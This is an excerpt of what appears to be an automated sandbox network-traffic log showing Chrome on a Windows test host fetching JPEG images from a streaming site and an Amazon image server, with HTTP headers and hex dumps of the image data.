                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 60 bc 73 b6 f2 0e 89 8d 69 60 44 b1 c7 0f 1b d6 a6 2d 8b 94 a0 11 76 ac 75 a4 61 f2 b1 f7 93 81 5f 93 2b ae b2 18 a7 6c 6c 18 e3 46 15 d4 d6 ce a6 b5 e6 39 9a 9d 43 f3 1e b5 1f 62 7a 34 ce 3a c7 b6 74 53 ee b0 4e b3 fb 44 2e 0e 27 8c 01 f7 96 64 0d d7 64 e9 7f b0 cd fa 59 ff 00 72 86 d2 f9 04 35 bb 96 0f bb a9 5f 91 74 be b2 da 01 7c f6 80 ce 45 17 10 99 55 ad 6a a0 59 89 c1 15 a5 54 35 cd c1 71 ed b6 80 13 26 db 4d b5 94 2f 72 52 aa 90 82 fe f8 5c ab 4d fd 40 f6 83 c4 0d ff 00 8e a6 b5 15 8c 3f 30 0d 4e a4 34 e3 d6 83 ba eb f4 61 2f c6 fa 95 e0 46 15 58 44 59 2f a2 9b d8 bb 53 65 34 af 08 dd 30 54 fb 57 4e e8 35 0a b0 3b 07 9c 5b 03 fc 1c 8a d3 60 9b 50 a7 38 2d ae c5 f6 50 ba 05 c8 4d b6 e6 18 52 6f e5 7e 85 64 8c 4a 4d 75 f3 19 36 87 7e ea a8 07 e7 83
                                                                                                                                                                                          Data Ascii: `si`D-vua_+llF9Cbz4:tSND.'ddYr5_t|EUjYT5q&M/rR\M@?0N4a/FXDY/Se40TWN5;[`P8-PMRo~dJMu6~
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 31 9f 67 1f 39 ba 9b f0 9d 57 13 ed 19 d2 6f 29 51 31 ac 67 b4 d7 2a a1 d5 5b 67 37 1f 1e a2 6b ad 6e e6 39 7d 4f 3c a7 28 73 ce 4b 32 c7 e5 b2 47 7d a9 63 ab 29 36 6c 4b 19 9a a0 81 ed e6 b3 97 b7 50 4e bd fb d7 d0 c0 3d 8b 04 f9 9b 8d e7 cc 66 df 89 5a a7 33 ce b0 4e f5 6b f9 f3 8a 79 d9 58 7f e9 e9 71 f7 1e 96 c7 f5 e3 a5 78 81 50 67 e4 8c 0a 0b 85 4d 83 cb 07 a5 b6 53 c6 c0 d6 71 41 96 9c dd 54 bf 44 56 2b 2a c3 4a 4b 5a fd 75 d5 e9 d8 e9 57 7b ec 0b 93 42 5a 16 e7 18 29 f3 2a 45 36 79 c8 3f c4 6a 57 9f db ed 58 9f b3 c7 04 d2 22 5b 69 55 a5 dd 72 45 72 b2 48 f2 a3 f2 9b f1 37 3a ef ee 5f 43 17 f5 2c 3e 35 37 a8 53 94 14 95 dc fa 76 f9 88 da 24 94 6e 2a 56 70 4e 2a 5e b0 cb 6d 61 4a be 62 bb 1c 2e a1 45 43 8a ba d3 59 7c a6 cf ce 6c db b9 94 d9 e2 26
                                                                                                                                                                                          Data Ascii: 1g9Wo)Q1g*[g7kn9}O<(sK2G}c)6lKPN=fZ3NkyXqxPgMSqATDV+*JKZuW{BZ)*E6y?jWX"[iUrErH7:_C,>57Sv$n*VpN*^maJb.ECY|l&
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 6a 1e c1 35 e0 43 e2 37 dd 6d 41 ec 03 d0 0d c5 ed d2 06 bb 4d e3 76 20 f8 1f 49 76 df 58 56 f1 ee c7 5b 6e 05 e5 35 be 1d a5 6c aa d3 62 58 59 8f 05 a6 e6 cb cc 7c 6c 8c 56 b6 e4 3c d7 5c 09 12 d4 34 d9 b9 9b 7f d4 1e 75 91 69 98 3d 65 e8 e2 af 8f 7d 36 71 ec 8d e3 2e 96 9f f7 26 db ad e7 c1 eb 33 23 17 ed f8 ee 59 91 a5 8a 34 26 77 ec 9f 97 ce 22 12 4b 44 5e 03 5e 9d 77 f7 2f ad 7f 0b 0b 78 f4 a3 e0 cb 6c fc 76 cc bf 30 32 e8 70 ee 6c cc 3c 8a 98 71 b2 f2 f5 bb 21 b2 de ca 24 5d 2b 72 7c 17 aa dd cc d5 fa 5e 55 4e 9d 7b 14 b2 85 4f 68 02 7f a8 71 91 28 42 3a 4f 55 04 25 77 7d 42 fc 01 e6 75 0c 03 9a 00 99 dd 29 f1 57 98 c5 e8 89 7d 61 e6 16 13 57 75 6e 80 35 c7 df ec af 4a 3a b5 2b 49 a4 a6 46 72 a9 0a ad ac 6b 57 81 be aa cf 13 75 dd f6 2d 14 17 21 45
                                                                                                                                                                                          Data Ascii: j5C7mAMv IvXV[n5lbXY|lV<\4ui=e}6q.&3#Y4&w"KD^^w/xlv02pl<q!$]+r|^UN{Ohq(B:OU%w}Bu)W}aWun5J:+IFrkWu-!E
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: da f6 9a a7 0f 2a 67 3e d7 25 8c 54 f2 13 20 ec 89 bd 79 8f ee e4 ab cf 7c a3 7e d3 be 51 fc 59 e7 63 72 d2 cd 5c ac 6d 86 fb 0b 3b 6b ed d7 69 25 e8 17 5a 40 09 f2 6a ae 76 eb 9c 77 cb 4b 60 1a 8c 54 ce e2 8f 30 3a af 82 c4 73 a8 ce ea 2c f1 e0 42 35 ea 94 ef c9 ec 8d ce d0 8f 5f 1f 40 11 bc 03 50 02 76 44 6a 95 7e 4e bf 85 52 df 1d 87 9d 86 8e 9c 7c 11 3b 53 b4 23 20 1f db 4d 61 95 c9 7c 74 5e 73 b2 83 91 87 19 3c 4e 28 51 ac 1d b4 1c 49 6a 14 69 63 52 88 1a 53 ae 4b b1 5a ce 08 93 37 88 d6 bf b1 2f 3e 14 73 b2 06 7f 31 ed 2f e8 a7 89 dc 37 ee 7d 44 ee 35 83 88 ed 34 0a 57 c9 ee 24 66 53 e9 5d dc 06 a1 c9 26 77 d9 fe 1d 59 8e e7 69 a2 9e 27 c9 b0 18 ec 1a 20 2c a4 07 25 83 72 2c 5b 73 b8 e3 51 df 80 d4 19 03 4a 09 c9 de 8c 19 1f c3 54 36 c0 4e 7e 54 c0
                                                                                                                                                                                          Data Ascii: *g>%T y|~QYcr\m;ki%Z@jvwK`T0:s,B5_@PvDj~NR|;S# Ma|t^s<N(QIjicRSKZ7/>s1/7}D54W$fS]&wYi' ,%r,[sQJT6N~T
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: b8 c6 a8 49 f1 10 54 06 63 fa 2c ea be ab 17 cc c7 f1 b3 0f 51 53 dc 06 b1 03 86 04 13 d4 6a b6 4e 4d 8d b2 22 61 4d ce c0 be d0 e7 a2 14 e5 70 18 95 c1 97 4d a1 28 dc 82 08 84 cd a6 f3 17 f3 59 d5 7d 57 d3 1e 4e 23 65 11 cd f8 07 23 72 5b 11 04 b6 4c 3d 31 66 b3 95 c1 f8 c2 08 55 33 8c 8f 61 dd 41 2a 70 8f f2 03 0d 82 44 c7 93 e2 d6 fc b5 89 cc c3 fc 92 75 3f 41 2a 06 23 c6 30 09 b7 6a 5c 84 03 91 84 00 64 e1 b5 fc 0e 43 16 10 e2 21 78 19 82 b1 69 47 c4 c2 59 72 0a cd d1 e3 24 b8 aa e2 2f 29 35 9a cc 5f cd 67 51 ca 0f 4a 81 85 15 81 83 3c 2b 03 05 33 2f fc 92 e4 d4 04 c9 f2 e5 86 b8 88 80 54 aa 36 35 5b b3 fe 8b 60 6f 2b 88 f0 c0 d4 a9 8b f9 ac 7c 41 c5 1e ca 7e f6 b1 91 c1 c3 8c 0b 8b 85 07 33 b8 3c 4f 6c ae 2c fb 24 9e c9 21 c1 6b a9 f6 49 3d 92 cf 62
                                                                                                                                                                                          Data Ascii: ITc,QSjNM"aMpM(Y}WN#e#r[L=1fU3aA*pDu?A*#0j\dC!xiGYr$/)5_gQJ<+3/T65[`o+|A~3<Ol,$!kI=b
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: d8 d9 28 95 ca df 5b 25 7e f8 66 b9 1e 0d 64 da 78 f9 74 62 cf d9 b9 38 56 64 af b4 aa 98 40 74 ae 48 f3 ae 4a 3e 22 1f 6d 26 37 01 86 b2 07 16 71 ad 80 ff 00 2d 74 a0 71 ee ee 7d 80 19 1f 90 de 34 2d ca 64 e7 a5 68 f3 39 b5 87 65 7c 5c 3a b6 de 5f c8 7b bd 49 d1 c7 a0 5e c7 1a 91 99 50 cd b7 4b 34 b3 cf e5 d7 36 10 14 da eb 81 64 39 33 01 56 fd d2 8a c7 8a f4 42 bd 91 28 00 23 59 24 1b d3 8d 8b 91 6a 90 18 fe 75 d9 b9 01 72 77 81 0a 19 27 ce 72 19 03 9c ac c3 4e 38 c0 db 5d a8 5c e3 6c 72 32 0c f9 0b e3 ca a2 af 9b 2f 2f f8 d2 9f 0d 65 e3 ac ea e3 26 b8 f2 0e b9 d8 f9 28 eb 9f 8f 8f 94 37 2c 46 39 99 11 f4 b7 69 1f 4d 8e ac ac 94 7f 1c 78 d7 9f 54 3c bb 6b 62 fd 95 d0 e0 1f 76 b9 f6 e2 b0 52 c5 cd 54 ca 8c 4e 36 24 7d ed 90 11 91 3a c7 e6 15 84 d7 c9 9b
                                                                                                                                                                                          Data Ascii: ([%~fdxtb8Vd@tHJ>"m&7q-tq}4-dh9e|\:_{I^PK46d93VB(#Y$jurw'rN8]\lr2//e&(7,F9iMxT<kbvRTN6$}:
                                                                                                                                                                                          2024-12-15 11:38:01 UTC1378INData Raw: 8b 82 8a 2e 0a 28 91 3a 8a 25 13 90 f5 f0 1d 6d 21 c6 10 87 78 8e d7 84 3a 80 9c e1 6a 03 83 96 9a cd 19 a5 b4 cf f8 8e 25 44 63 de c3 c8 30 40 43 b2 48 97 f5 57 b2 ed 67 78 0c f8 d5 43 9a dd e1 47 07 d5 01 9b 0d f1 fb 7a a9 03 73 f0 a2 73 8a b7 ba 08 07 c4 85 53 77 a0 ac b0 9a 1b 0f 74 a8 db 68 cf 1e d1 2c d3 e7 07 ac b8 a8 0e fa 70 75 7b 73 c8 5a ff 00 0b 01 e9 d6 85 e9 e8 ba 39 c6 4c f0 ec b4 3a b5 a9 30 8b d3 36 1f 20 b4 cc 87 f4 c3 c0 21 fe a4 d9 a8 db 50 9a 96 ba ba aa 2c a1 bb f9 23 e0 93 f3 82 88 1d 4a 6d c1 7d bc d4 4d 10 ac 28 cd 4f 71 50 be b2 43 9d 88 17 1b d5 4b 6b 67 5d d8 4f 1f 85 42 ae c7 db f0 b0 1d 6a 45 ec 84 d4 db 25 57 9a 9a aa 25 7a ba c3 2d f7 a9 b7 9e 4a e9 65 ee e0 25 45 f6 fc 4c 15 91 aa 33 c2 e8 cf 07 44 0d eb c0 f9 29 85 f6 94
                                                                                                                                                                                          Data Ascii: .(:%m!x:j%Dc0@CHWgxCGzssSwth,pu{sZ9L:06 !P,#Jm}M(OqPCKkg]OBjE%W%z-Je%EL3D)


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          58192.168.2.1649788172.67.131.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:01 UTC586OUTGET /jwjzcdhlaa.jpg HTTP/1.1
                                                                                                                                                                                          Host: images.fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:02 GMT
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Length: 35043
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          etag: "2a534114cd20518c30d23e71999d5ad6"
                                                                                                                                                                                          last-modified: Mon, 25 Sep 2023 08:22:29 GMT
                                                                                                                                                                                          x-amz-id-2: txga4645cf608434b96b4ac-006759b082
                                                                                                                                                                                          x-amz-request-id: txga4645cf608434b96b4ac-006759b082
                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                          Age: 331543
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cq2oyXiHEZqwEP3w0N2RB87AvqOEFMQbLI3zSExkdXL51Lvefrbze5pbvd6mZUxBwsrtxJAWtMCcBh3j8EizhaAQyvK%2BMdJB2mKsBcP7GDcJE9BADhOEsz92t%2Bk%2BxD%2Fve%2FClin8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2625233e148c3f-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2042&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1164&delivery_rate=1423001&cwnd=226&unsent_bytes=0&cid=681ce27e6e5f7a2c&ts=454&x=0"
                                                                                                                                                                                          2024-12-15 11:38:02 UTC327INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 05 06 06 05 08 08 07 08 08 0b 0a 09 09 0a 0b 11 0c 0d 0c 0d 0c 11 1a 10 13 10 10 13 10 1a 17 1b 16 15 16 1b 17 29 20 1c 1c 20 29 2f 27 25 27 2f 39 33 33 39 47 44 47 5d 5d 7d 01 05 05 05 05 05 05 05 06 06 05 08 08 07 08 08 0b 0a 09 09 0a 0b 11 0c 0d 0c 0d 0c 11 1a 10 13 10 10 13 10 1a 17 1b 16 15 16 1b 17 29 20 1c 1c 20 29 2f 27 25 27 2f 39 33 33 39 47 44 47 5d 5d 7d ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 01 02 08 00 09 ff da 00 08 01 01 00 00 00 00 e5 ec e7 6d 55 f4 9c 66 99 d5 2d 71 af bd b7 b5 d7 de c6 be db 0a 29 ae 8a 68 ee 4b 48 6c e3 da 63 1b 63 db 6b 9d 7d 8f 7b
                                                                                                                                                                                          Data Ascii: JFIF) )/'%'/9339GDG]]}) )/'%'/9339GDG]]},"mUf-q)hKHlcck}{
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: ab d6 ec 34 4b db 3c 71 ed 75 da cb e8 4e 48 68 d9 0d 9d 6b 14 dd 5b 7a 0c 17 2a 33 46 41 93 89 db 37 a5 9a 81 d3 55 5e e5 41 59 ce b9 92 57 a9 2e be 12 19 e9 88 ea ca b2 96 90 6b 73 f5 57 34 47 57 c3 10 39 74 ce 5b aa 2e ce 71 a4 bb 3e 73 84 fa 26 dc e0 a2 5e a5 e7 8e a3 a1 28 99 8e f4 e6 d6 b6 25 cd ca 67 c0 1d 66 21 92 ee 53 ea aa a2 7e 32 80 a8 66 3b 6c ca 17 e7 ca c9 4a 9c f5 80 50 9d b9 5c 1f 0d 54 61 a1 7d a8 ee 14 f0 02 7c 51 85 df cb 16 1d d5 c5 5d ab c2 22 9d 29 7d 70 15 e7 d1 fe 1b e0 9c 61 5e 97 33 a4 fa 82 53 95 3a c2 bd a8 1b c2 d8 5d 09 95 29 d9 20 fb 32 5f 8e 40 7e 8e f0 8f 78 7c f7 8c ea ab af 80 58 74 05 ca 4f 41 f3 6d d4 5c 17 7f f3 c9 55 d0 31 ed 2a 2d bd 27 7c 36 9e a6 c9 82 ae 68 ee 28 18 fa 33 c1 7d e9 c2 76 67 54 f2 75 0c 86 8f cf
                                                                                                                                                                                          Data Ascii: 4K<quNHhk[z*3FA7U^AYW.ksW4GW9t[.q>s&^(%gf!S~2f;lJP\Ta}|Q]")}pa^3S:]) 2_@~x|XtOAm\U1*-'|6h(3}vgTu
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: b5 12 4b 2a c9 b3 c4 77 b2 a1 c5 a9 5b c2 47 e2 5b a2 ea 7a ff 00 57 b2 77 69 b8 18 eb fb a4 ad ff 00 18 53 ba 90 48 6a 2e 82 4e a4 e3 d6 8b f6 ce 0c ec ea 8d 9b 55 2c 3b 94 7e 8f 55 17 c6 66 f1 41 c5 e7 f6 9c 4f 15 0c 4c 37 94 c0 eb 24 d7 7e 93 e8 d5 70 f8 9c be a7 43 3e e8 12 86 54 a0 ff 00 a4 e5 2e 41 66 56 6c c5 92 0b ca 1d 37 6a f3 75 36 d2 26 2f 5d dc 94 48 6c 6a 3d 1e f3 4a f9 2c 11 74 12 ed 82 e9 b5 a7 a5 3a 38 8a 5d fc a4 1c 2d 13 d0 44 d3 1c 63 5a f4 47 27 b3 dd 6b 3e 51 5b 36 18 b2 97 c0 2c 0e 2d a3 f7 8a 46 94 d7 54 f9 0d c7 6e 91 32 79 5c 9e 51 77 9c 6b ee 33 81 b7 b9 d1 05 77 bc 56 c9 f3 e9 de 69 1e 98 e8 28 19 08 a7 c2 82 d6 21 47 29 c4 5c 96 8d a1 33 5a c8 1b 55 31 04 55 65 49 84 47 f4 df 37 f2 5b cd df 2e b9 da 91 b1 7b a9 a0 ef 3d 6e 20
                                                                                                                                                                                          Data Ascii: K*w[G[zWwiSHj.NU,;~UfAOL7$~pC>T.AfVl7ju6&/]Hlj=J,t:8]-DcZG'k>Q[6,-FTn2y\Qwk3wVi(!G)\3ZU1UeIG7[.{=n
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: be a0 64 73 12 fb 05 69 e5 a3 66 5f 53 5c a0 f2 1d e9 35 38 72 c0 a5 79 7f 49 bc 3b a8 f3 5d c8 28 91 9c 77 93 4b ad 80 cd 61 48 4d 1d 99 bd e5 5d a6 6a 67 50 47 b7 5c e6 c1 0c a8 f5 36 1f 2f ad 3b 73 be 78 fe 51 7e 18 2d c7 1d d7 75 26 38 06 5b f7 de 31 de 0b ad 1f 40 bb 50 01 50 7d 20 59 0b f0 dd 15 d0 39 30 2b 7c e5 cc c5 66 a5 a8 a3 2f 6f 46 89 e0 61 4a e0 1d 9c d0 c3 ab fe ad de 91 6f b7 e8 90 c2 22 8f 81 c5 07 10 32 c3 43 11 a6 86 e5 52 a2 62 b3 2e b3 fb c7 58 ba 2f 39 e7 9d 35 af 96 14 c1 3e 45 70 43 2d a8 99 93 79 61 b7 31 e9 af 1d 3e 03 94 34 bd 92 5e 85 64 8f 2d 65 65 57 c6 18 ab 6f ed be 7e d2 b8 66 9d 0b eb f6 f9 a1 fe ae 1e e9 8d 0c cd 95 b4 5f 91 4e fa 96 e7 98 6e d7 65 c6 34 ad 24 06 c6 67 9d b0 ac 06 6c b6 07 8e 30 f6 48 52 cd ac b4 91 b6
                                                                                                                                                                                          Data Ascii: dsif_S\58ryI;](wKaHM]jgPG\6/;sxQ~-u&8[1@PP} Y90+|f/oFaJo"2CRb.X/95>EpC-ya1>4^d-eeWo~f_Nne4$gl0HR
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: d7 7e bb b6 a3 b1 ed 0a 9f 07 5b e8 81 74 63 13 5d 62 b6 2d 64 b3 97 c6 f3 a0 4f 63 5e d7 31 c2 ed 22 c4 2a b8 3d 16 a2 58 89 ee 9c bc 96 c1 73 00 95 be f1 fe 9b ea e2 33 d3 4f 10 d5 cc 20 21 71 96 ef 1d db 0d 82 d3 3b 9e 41 6d 7f fd 3a a3 e5 fa ad 8c 4b 6a 58 de ba a9 5e c6 18 71 73 7e 48 8b 82 07 45 4d 15 b0 b7 de 2e cf 75 0c 9c 63 57 20 d0 ca 6d f2 53 67 59 58 7f ea 6e 9e 2e 23 7c 42 d8 6f b0 96 23 ba d7 dd 17 f6 9d ab 33 fd d8 06 16 f9 ad b0 4f a1 db e2 7b 42 a0 16 9e 25 b4 1b 8a 95 e7 e0 b3 be 8a 98 ff 00 67 87 f0 ad a3 2b 9b b4 6a 9e d3 98 7d 81 f9 28 7e d5 87 ef 04 dd 1b f2 58 b0 ed 17 9f fa ce fd 50 ce ca ab f9 ba 93 ff 00 55 df aa 7e 81 6c 4a 3e 0c 3c 67 77 a4 d3 f0 a2 43 41 24 d8 0d 56 d1 a9 15 95 4f 95 bd dd 1b e4 15 3d 54 94 af c6 c5 4f b7 9a
                                                                                                                                                                                          Data Ascii: ~[tc]b-dOc^1"*=Xs3O !q;Am:KjX^qs~HEM.ucW mSgYXn.#|Bo#3O{B%g+j}(~XPU~lJ><gwCA$VO=TO
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: 47 67 d1 5f 17 a3 b1 56 d6 47 45 19 11 db 19 16 68 dd b0 ea 5a de 24 2e 3f 78 2a b9 2f 90 99 cd 1c f2 46 66 bc 76 51 47 7b 1e b5 08 8d c1 35 46 31 3d 9e 19 fa fb 4e 8d 95 10 3d e0 7b 46 0b 83 fd 37 0c 95 d0 e7 b8 6e 03 b2 32 f5 4a d9 af 6c 32 71 5c 2f a8 4e da b4 f8 73 c7 f4 53 63 a8 9a 47 80 73 39 5d 32 8d ee d4 d9 70 26 a7 7b 64 67 23 92 13 b2 ae cd 0c 78 7d b3 6e 2c 97 0a 66 38 33 86 6e ed 13 86 07 96 df 79 57 b2 8d d9 04 0a 1a a2 cc 2e 28 28 8d 9e df 1c b7 b9 f8 7b cd 36 ea 9b 28 90 da 3c ca cd e1 86 f8 48 b9 fa 21 33 39 f6 7c d5 5c cd 86 9e 57 1f 84 ee cd 5c ab 94 f3 88 dd 0d d0 67 13 7d 53 c9 46 30 b0 05 22 86 4f 75 34 a0 e0 6e 14 91 fb ed d7 5c 95 75 64 b2 4b 0b 87 67 86 3f 34 f9 44 b2 07 b7 df 60 fa 8d 55 d5 f7 5b 73 1f b8 58 ea ac 9b 9e 4a 37 e2
                                                                                                                                                                                          Data Ascii: Gg_VGEhZ$.?x*/FfvQG{5F1=N={F7n2Jl2q\/NsScGs9]2p&{dg#x}n,f83nyW.(({6(<H!39|\W\g}SF0"Ou4n\udKg?4D`U[sXJ7
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: 9e a3 27 6b d7 9a 14 2c c4 6d 21 29 d1 43 0e 4e 71 bf 40 98 54 12 ba 27 01 ee 13 a7 4b fa 8e 70 60 24 e8 16 d2 91 f2 53 bc e8 32 cb f7 53 fb bf 87 76 cd d8 a5 f8 66 aa 16 67 26 73 3e 6b b2 d0 00 16 03 92 ab af 82 94 7b 47 67 c9 a3 55 59 b4 25 ac 70 bf 66 31 a3 13 f5 de ee e8 dc dd 3d 58 cf b3 52 72 dd 17 70 6e 09 a8 b0 3c 66 ad 23 18 46 ad 54 f7 6b ae 35 53 c6 c9 5e f2 46 64 9c d1 8a 48 cf 64 dd 47 3c c4 8d 72 50 54 c9 13 ef a8 e6 9c 3b 65 f7 bb 5c 6e 0a 62 b5 c2 82 4e 2c 6d 77 3e 7e 7b e6 8c c8 cb 03 cc 2a f8 66 f4 77 0e 11 39 8d 33 42 8a a2 aa dc 38 c9 16 d7 92 a0 d9 10 d2 5a 49 6c f9 7a f2 6a a9 da d4 74 f7 f6 b8 dd d1 99 a9 f6 cd 44 d7 e1 fb 36 fe 69 c4 b9 c4 93 72 87 24 fd 77 bf 54 13 79 a3 ae f0 a1 d0 a9 75 dd 0f 75 04 13 50 3f 74 ac 21 cc 2d ea 2c
                                                                                                                                                                                          Data Ascii: 'k,m!)CNq@T'Kp`$S2Svfg&s>k{GgUY%pf1=XRrpn<f#FTk5S^FdHdG<rPT;e\nbN,mw>~{*fw93B8ZIlzjtD6ir$wTyuuP?t!-,
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: 8d a5 ce 00 20 d0 18 00 e4 16 d0 8b 26 49 f2 2b 09 dc d4 d5 40 fb 89 bf 12 73 95 44 7c 4c b1 d9 36 a9 d0 46 df 79 d7 b5 ba 5b 92 8d e3 68 3e 10 f1 62 d6 9c 65 45 81 9c 36 b0 0b 03 6b 0f 14 c3 89 d2 1e 9d 9f a2 d3 32 b6 a5 51 a9 96 fe e0 c9 a8 ee 87 9e f7 f7 8e f1 bd da 0f 50 04 ce e8 4c ee b7 c9 13 72 4f 8a 28 69 ba 86 3b b8 bf a2 0a 76 63 63 9b d5 37 2c 8a 23 70 54 cf 2d 7c 82 f6 b8 07 e8 57 12 40 e2 1c 8b 9b 7e f6 6a a8 37 b2 e1 aa a6 8f 87 1f 89 cd 53 82 66 65 8d 8f 2f 30 98 ec 6f 7b c0 b0 36 fa aa be d4 33 b7 90 61 ba 9f dd 41 8e 79 b3 5a 49 e8 14 d4 95 34 e1 86 58 5c c0 ed 2e a2 ef 2e 7b a4 ef 6f 1b 80 d1 3c 5e cb 02 c0 b0 a0 d4 c1 92 c5 86 9c 9f 0d c7 7d 34 78 22 68 e7 a9 dc e5 56 cc 12 5f e2 58 95 d0 59 8e d0 e4 85 3d 53 dd c5 a8 97 05 f9 1e 6a 6a
                                                                                                                                                                                          Data Ascii: &I+@sD|L6Fy[h>beE6k2QPLrO(i;vcc7,#pT-|W@~j7Sfe/0o{63aAyZI4X\..{o<^}4x"hV_XY=Sjj
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: 6b 6f e6 8b 70 dd 0c cd 97 05 96 cf 34 62 1f 0b 53 db 84 e9 bc b5 59 59 7a 44 b5 64 32 41 d9 03 3e 9f 35 68 69 26 8e 58 db 9b 6f 97 9f 55 26 d2 92 46 b9 a6 26 7e cb 68 4d b3 1d fd ad d1 17 54 5a c1 bc af e3 e4 a9 b6 65 55 45 88 18 1b d5 ca b3 63 d5 52 b5 b2 b7 b6 de 65 be ea 15 92 54 b0 34 8b 7c 67 e2 dd 75 1b 87 13 2f 9a c0 8b 70 82 4e 81 36 52 c9 3b 2d 4d 88 03 88 86 df c1 4e c6 49 13 9b 71 7e 48 ab aa 68 27 9a 36 70 20 0c 66 b7 7e 43 fd d7 f0 e9 65 84 b2 4a 86 59 c3 dd 62 8f 67 3e 26 b5 bc 5c 61 ba 72 39 aa 92 29 70 e3 6b f3 fb aa 3a b8 65 c5 86 f9 0b 9b a3 50 cc 0d cf 20 48 fa e6 a9 9e 27 82 37 7f a4 f9 b7 42 99 8e cd 73 a3 0f cb bc 35 45 98 e4 b3 b5 3a f8 35 6d 79 db 1c 98 47 da 9f d1 17 97 f7 8d d3 bb c2 c8 61 8b c5 c8 99 5f cf 0a b1 1e f9 4f ed 0d
                                                                                                                                                                                          Data Ascii: kop4bSYYzDd2A>5hi&XoU&F&~hMTZeUEcReT4|gu/pN6R;-MNIq~Hh'6p f~CeJYbg>&\ar9)pk:eP H'7Bs5E:5myGa_O
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1369INData Raw: e2 05 c4 0b 1b 56 36 ac 4d 57 68 58 9c ee e3 57 a0 d4 11 89 f1 ba de 4a 9e 06 89 21 e8 5c 13 81 e4 8c 10 38 93 77 33 a8 1b c1 20 82 0d 8f 55 57 2b b8 52 bc 9b b8 f3 f3 54 31 b1 c1 d7 00 aa 96 35 af 91 a3 45 0d 51 65 99 27 74 68 7a 26 ca d3 9b 73 f2 46 5b 72 fa a9 2a c6 83 b4 7c 13 71 c9 1b 9f 89 ad 23 92 a0 96 9d d1 11 14 58 1f ef 04 e8 4c 87 06 b2 77 b5 ee d9 43 09 88 b6 57 b5 de 1d 9e a8 c8 e7 e6 d3 84 01 8b e2 26 e9 92 fb 30 5d a9 26 d6 e6 a5 78 6d f1 c7 c4 70 ed 70 c6 82 dd 4a f4 a9 2a e3 7e 6c 63 74 6b 01 ed 38 aa 30 ce 03 43 79 6b 7e ab 03 a9 e5 e1 8f b1 7d f0 9f 84 f4 53 7f 11 c7 83 86 c7 b7 93 b0 8f cd 47 86 3b b7 18 e5 7c 80 5b 42 18 5b 8a a1 b6 63 bc 74 71 fd d4 d5 0f 3d e7 5c fe 88 12 f7 5a ea 3a 47 c9 93 41 3e 4b d1 07 53 75 e8 63 c5 7a 37 42
                                                                                                                                                                                          Data Ascii: V6MWhXWJ!\8w3 UW+RT15EQe'thz&sF[r*|q#XLwCW&0]&xmppJ*~lctk80Cyk~}SG;|[B[ctq=\Z:GA>KSucz7B


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          59192.168.2.1649789151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:02 UTC445OUTGET /images/M/MV5BMzE5MDM1NDktY2I0OC00YWI5LTk2NzUtYjczNDczOWQxYjM0XkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
